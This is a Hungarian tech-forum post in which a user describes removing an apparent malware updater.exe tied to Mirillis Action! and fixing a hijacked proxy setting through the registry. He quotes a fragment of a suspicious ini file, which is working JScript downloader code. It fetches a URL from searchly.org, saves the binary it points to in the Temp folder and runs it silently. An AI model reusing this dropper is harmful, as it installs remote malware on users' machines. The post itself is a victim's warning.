bannerkesz.png
**********************************************************



*******************************************

Megszűnt szolgáltatások:
Comodo elemzés
Valami nyavalya lezárta a gépem és kódot kér. :(

  • Jim Morrison
    #40890
    na frankón kiszedtem egy vírust vagy mit, amit akkor szedtem össze, mikor felraktam a bitdefendert meg ilyenek. Azt vettem észre, hogy van egy update.exe ami csak eszi a memóriát és a hálózatot is folyamatosan foglalja. Akárhányszor becsuktam mindig jött a böngésző, hogy kapcsoljam ki a proxyt. És tényleg volt helyi hálózatra proxy, nem is értettem, kikapcsolni meg nem tudtam. internetbeállításokban meg volt egy alsó sárga figyelmeztetés, hogy csak admin változtathat proxyt. Wut? Végül sikerült megoldani, hogy regeditben kellett egy PerUserProxy értéket 0-ról 1-re állítani, miután töröltem a Mirillis mappában lévő updater.exe-t.
    Ha esetleg találkozna valaki hasonlóval, bedobtam ide.

    Valszeg a mirillis action! tette fel 1 hónapja kb, de semmi nem észlelte. Meghagytam egy elég érdekes ini fájlt:
    SPOILER! Kattints ide a szöveg elolvasásához!
    részlet:

    var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    WinHttpReq.Open("GET", "http://searchly.org/xVwd2.php", /*async=*/false);
    WinHttpReq.Send();
    strDlUrl = WinHttpReq.ResponseText;

    var TmpDir = new ActiveXObject("WScript.Shell").ExpandEnvironmentStrings("%Temp%");

    var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    WinHttpReq.Open("GET", strDlUrl, /*async=*/false);
    WinHttpReq.Send();

    BinStream = new ActiveXObject("ADODB.Stream");
    BinStream.Type = 1;
    BinStream.Open();
    BinStream.Write(WinHttpReq.ResponseBody);
    BinStream.SaveToFile(TmpDir + "\\wVx4rt.exe",2);

    var WshShell = new ActiveXObject("WScript.Shell");
    WshShell.Run (TmpDir + "\\wVx4rt.exe /quiet");